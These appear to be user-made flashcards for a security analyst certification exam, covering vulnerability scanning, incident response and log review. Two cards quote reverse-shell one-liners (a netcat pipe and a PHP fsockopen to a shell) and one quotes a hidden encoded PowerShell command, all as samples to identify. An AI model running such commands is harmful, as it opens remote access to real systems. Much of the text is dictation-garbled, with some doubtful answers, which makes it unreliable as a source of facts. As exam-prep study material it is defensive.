Chapter 2 Flashcards by Kj Roberge

The chief information security officer wants to eliminate and reduce Shadow IT in the enterprise. Several high risk cloud applications are used to increase the risk to the organization, which of the following solutions will assist in reducing the risks.

How well did you know this?

Not at all

Perfectly

An end of life date was announced for a widely used OS. A business critical function is performed by some machinery that is controlled by PC, which is utilizing the OS that is approaching the end of life date which of the following best describes a security analyst concern.

Any discovered vulnerabilities will not be remediated

How well did you know this?

Not at all

Perfectly

A security analyst needs to block, vulnerable ports, and disable legacy protocols. The analyst is insured net bios, Trio, Telnet, SMB and TFTP are blocked and or disabled which of the following additional protocols should the analyst block next

SNMP version one

How well did you know this?

Not at all

Perfectly

During a scan of a Web server in the perimeter network of vulnerability was identified that could be exploited over report 3389. The web server is protected by a WAF, which of the following best represents the change to overall risk associated with a vulnerability.

The risk would increase because the host is external facing

How well did you know this?

Not at all

Perfectly

An organization would like to ensure it’s cloud infrastructure has hardened configuration. A requirement is to create a server image that can be deployed with a secure template which of the following is the best resource to ensure secure configuration.

CIS benchmarks

How well did you know this?

Not at all

Perfectly

A cyber security analyst has recovered a recently compromise server to its previous state which of the following should the analyst perform next

Forensic analysis

How well did you know this?

Not at all

Perfectly

A payroll department employee was the target of a fishing attack in which attacker impersonated the department director and requested that direct deposit information should be updated to a new account after a deposit was made to an unauthorized account which of the following is the first action the incident response team should take when they receive notification of the attack

Review the actions already taken by the employee, and the email related to the event

How well did you know this?

Not at all

Perfectly

A penetration tester submitted data to a form in a web application which enabled penetration tester to retrieve user credentials, which of the following should be recommended for remediation of this application vulnerability

Performing input validation before allowing sub submission

How well did you know this?

Not at all

Perfectly

A security analyst detected the following suspicious activity, which of the following is the most likely describes the activity

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234>tmp/f

Reverse shell

How well did you know this?

Not at all

Perfectly

An incident response analyst notices multiple emails, traversing the network that target only the administrator of the company. The email contains a concealed URL that leads to an unknown website and another country which of the following best describes what is happening.

Social engineering attack
Obfuscated links

How well did you know this?

Not at all

Perfectly

The web facing application team notifies a SOC analyst but there are thousands ofHTTP/404 events on the public facing Web server which of the following is the next step for the analyst to take

Identify the IP/host name for the request and look at the related activity

How well did you know this?

Not at all

Perfectly

A security analyst needs to provide evidence of a regular vulnerability scanning on the companies network for an auditing process which of the following is an example of a tool that can produce such evidence

Open VAS

How well did you know this?

Not at all

Perfectly

A security analyst is performing vulnerability scans on the network the analyst installs a scanner appliance configure the subnet to scan and begin, begins the scan of the network which of the following would be missing from a scan performed with this configuration

Registry key values

How well did you know this?

Not at all

Perfectly

Which of the following is a nation state act least likely to be concerned with

Forensic analysis for legal actions taken

How well did you know this?

Not at all

Perfectly

System administrator needs to gather security events with repeatable patterns from Lennox log files which of the following would the administrator most likely use for this task?

A regular expression
In bash

How well did you know this?

Not at all

Perfectly

A security analyst is responding to an incident that evolves a malicious attack on a network data closet which of the following best explains how the analyst should properly document the incident

Take photos of the impacted items

How well did you know this?

Not at all

Perfectly

A user is suspected of violating policy by logging into a Linux PM during non-business hours which of the following system files is the best way to track the users activities

/var/log/secure

How well did you know this?

Not at all

Perfectly

The vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint only three can be remediated, which of the following represents the least impactful risk given the CVSS 3.1 base scores

AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L - base score 6.5

How well did you know this?

Not at all

Perfectly

Security analyst can review the windows registry on end points to get insights into

system critical configuration items

How well did you know this?

Not at all

Perfectly

A cyber security analyst is reviewing SREM logs and observes consistent request originating from an internal host to a block list of external server which of the following best describes the activity that is taking place

Beaconing

How well did you know this?

Not at all

Perfectly

While revealing Web server logs and analyst notices several entries with the same time stamps, but all contain odd characters in the request line, which of the following steps should be taken next

Determine what attack the odd characters are indicative of

How well did you know this?

Not at all

Perfectly

The cyber security analyst is tasked with scanning a web application to understand where the scan will go, and whether there are URLs that should be denied access prior to more in-depth scanning which of the following best fits the type of scanning activity requested

Discovery scan

How well did you know this?

Not at all

Perfectly

A vulnerability analyst is writing a report, documenting the newest most critical vulnerabilities identified in the past month which of the following public MITRE repositories will be best to review

Common vulnerabilities and exposures

How well did you know this?

Not at all

Perfectly

Assistance analyst is limiting user access to system configuration keys and values in a Windows environment which of the following describes where the In Law can find these configuration items

Registry

How well did you know this?

Not at all

Perfectly

A security alert was triggered with an end user tried to access a website that is not allowed per organizational policy since the action is considered a terminable offense the SOC endless collects the authentication logs, web blogs, temporary files, reflecting the web searches from the users workstation to build a case for the investigation, which of the following is the best way to ensure the investigation complies with HRor privacy policies

Ensure that the case details do not reflect any user identifiable information password, protect the evidence and restrict access to personnel related to the investigation

A user reports a message as suspicious to the IT security team and analyst reviewed the message and notices that the following text becomes a hyperlink in the email which of the following would most likely explain this behavior %77%77%77%2e%63%6f%6d%70%74%69%61%2e%63%6f%6d

The text is encoded and designed to bypass spam filters

While reviewing web server logs, a security analyst discovers the following suspicious line which of the following is being attempted Php -r ‘$socket=fsockopen(“10.0.0.1”, 1234); passthru (“/bin/sh -i <&3 >&3 2>&3”)

Reverse shell

Turn the roller of a patch to the production environment. It was discovered that required connections to remote systems are no longer possible, which of the following steps would have most likely revealed this gap.

User acceptance testing

An employee is no longer able to login into an account after updating a browser. The employee usually has several tabs open in the browser which of the following attacks was most likely performed.

CSRF

A security analyst provides the management team with an after action report for a security incident which of the following is the management team most likely to review in order to correct validated issues with the incident response processes

Lessons learned

Anal review the following endpoint log entry Invoke - command -computer name client computer1 credential, XYZ company, administrator script, blocked client computer one

A new account introduced

An e-commerce organization recently experienced a cyber attack during the lessons learned meeting a cyber security analyst request that the RTO is prioritized which of the following is the greatest concern

availability

SOC analyst observed Wisconsin activities from an IP address activity follows a pattern of short burst toward a low number of targets and open source review shows that the IP has a bad reputation. The perimeter firewall logs indicate that inbound traffic was allowed. The destination hosts are high value assets with EDR agents installed which of the following is the best action for the SOC to take to protect against any further activity from the source IP.

Create a SIEM signature to trigger on any activity from the source, IP subnet detective by the web proxy or firewall for immediate notification

Which of the following should be updated after our lessons learned review

Incident response plan

A recent audit of the vulnerability management program outlined in the finding for increased awareness of secure coding practices, which of the following would be the best to the finding

Established quarterly SDLC training on the top vulnerabilities for developers

A cyber security analyst is doing triage in a SIEM and noticed that the timestamp between the firewall and the host under investigation are off by 43 minutes, which of the following is most likely scenario occurring with the timestamps

The NTP server is not configured on the host

Which of the following are process improvements that can be realized by implementing a SOAR solution

Reduce repetitive tasks, generate reports and metrics

Joe, a leading sales person added an organization has announced on social media that he is leaving his current role to start a new company that will complete compete with his current employer. Joe is listing his current employers customers however, has not resigned or discussed this with his current supervisor, yet, which of the following would be the best action for the incident response team to recommend.

Reformed no action tell HR or legal counsel advises on next steps

When undertaking a cloud migration of multiple SAAS applications and organization systems administrators struggled with the complexity of extending identity and access management to cloud based assets, which of the following service models would have reduced the complexity of this project

OpenID

An analyst is investigating a fishing incident and has retrieve the following as part of the investigation which of the following should the analyst use together more information about the purpose of this command cmd.EXE/C c:\\ windows\ system 32\ Windows powershell\v1.0\ power shell.EXe -window style hidden -execution policy bypass -no logo -no profile- encoded command

Echo the command payload content into ‘base64 -d’

An incident response team receives an alert to start an investigation of an Internet outage. The outage is preventing all users and multiple locations from accessing external SAAS resources the team determines the organization was impacted by denial of service attack. Which of the following should the team review first.

DNS

A company is in the process of implementing a vulnerability management program which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process

Passive scanning

A security analyst at a company called ACME commercial notices that there is outbound traffic to host IP that resolve to htps office365password.acme.ca the site standard VPN logon page is www.acme.com/log on which of the following is most likely true

The social engineering attack is underway

ASOC team Lead occasionally collects some DNS information for investigations the team leader assigned this task to a new junior analyst which of the following is the best way to relay the process information to the Jr analyst

Write a step-by-step document on the team wiki outlining the process

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat, which of the following is the best solution to secure the network.

Implement segmentation with ACLS

A security analyst has found a moderate risk item in an organizations point of scale application. The organization is currently in a freeze window and has decided that the risk is not high enough to correct at this time which of the following inhibitors to remediation does the scenario illustrate

Business process interruption

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations

threshold value

A cyber security analyst has been assigned to the threat hunting team to create a dynamic detection strategy based on behavioral analysis and in attack patterns, which of the following best describes what the analyst will be creating

TTPs

A recent vulnerability scan resulted in an enormously large number of critical and high findings that require patching. The SLA requires that the findings remediated within a specific amount of time which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA.

In degree in IT service delivery, ticketing system to track remediation and closure

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline which of the following should the analysis focus on in order to move the incident forward

Impact

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts the analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability and integrity of the data being hosted, which of the following should the security analyst perform first to categorize and prioritize their respective systems

Determine the asset value of each system

A third-party assessment of a recent incident determined that the incident response team spent too long trying to get the scope needed for the incident timeline and too much time we spent searching for false positive which of the following. Should the team work on first

Detection tuning

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed Moore quickly about new patches which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly

Host name CVE details

Several reports of sensitive information are being disclosed via foul sharing services the company would like to improve its security posture against this threat, which of the following security controls would best support the company in this scenario

Improve employee training and awareness

Several incidents have occurred with a legacy web application that has had Little development work completed. Which of the following is most likely cause of the incident.

Outdated libraries

A security administrator needs to import PII data records from the production environment to test the environment for testing purposes which of the following would best protect data confidentiality

Data masking

Which of the following can be used to learn more about TTP’s used by cyber criminals

MITRE ATT&CK

An organization recently changed its BC and DR plans which of the following would best allow for the incident response team to test the changes without any impact to the business

Perform a tabletop drilled based on previously identified incident scenarios

Corporation wants to implement an agent based in Point solution to help flag various threats. Review vulnerability feeds aggregate data provide real-time metrics by using scripting language languages which of the following tools should the corporation implement to reach the goal.

SOAR

An organizations threat intelligence team notes, a recent trend and adversary privilege, escalation procedures multiple threat groups have been observe, utilizing native windows tools to bypasses in controls and execute commands with privileged credentials which of the following controls would be the most effective to reduce the rate of success of such attempts

Harden systems by disabling or removing unnecessary services

Well performing a dynamic analysis of a malicious file. A security analyst notices the memory address changes every time the process runs, which of the following controls is most likely were running the analyst from finding the proper memory address of a piece of malicious code.

Address space layout, randomization

An organization has a critical financial application hosted online that does not allow event logging to send to corporate SIEM which of the following is the best option for the security analyst to configure to improve the efficiency of security operations

Use a vendor provided API to automate pulling the logs in real time

A security analyst discovered an ongoing rent attack or investigating a phishing. Email the analyst downloads copy of the file from the email and isolate the affected workstation from the network, which is following activity. Should the analyst perform next?

Search for other mail users who have received the same file

The cyber security team has witnessed numerous vulnerability events recently that have affected operating systems team decides to implement post based IPS firewall and two factor authentication which of the following does this most likely describe

System hardening

An analyst is creating the final vulnerability report for one of the companies customers the customer asks for scanning profile with a CS score of seven or higher. The analysis confirmed that there is no funding for missing database patches, even if false positives have been eliminated by manual checks, which of the following is the most probable reason for the missing scan result.

The server was off-line at the moment of the scan

After a security assessment was done by a third-party consulting firm the cyber security program recommended integrating DLPNCASB to reduce analyst alert fatigue, which of the following is the best possible outcome that this effort helps to achieve

False positive rates dropped to 20%

Which of the following defines the proper sequence of data vulnerability regarding the evidence collection process from the most to least volatile

Cash routing Table, physical memory, temporary partition, hard disk physical configuration

The security analyst observes a high volume of sin flags from an unexpected source toward a web application server within one hour. The traffic is not flagging for any exploited signatures, which of the following best describes this activity.

An attacker is executing your kindness activities by mapping which reports are open and closed

Which of the following best describes a document that defines and expectation to network customers, the patching will only occur between 2 AM and 4 AM

SLA

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

DLP

And Anna wants to detect outdated software packages on a server, which of the following methodology will achieve the subjective

Credentialed scanning

Chapter 2 Flashcards

(71 cards)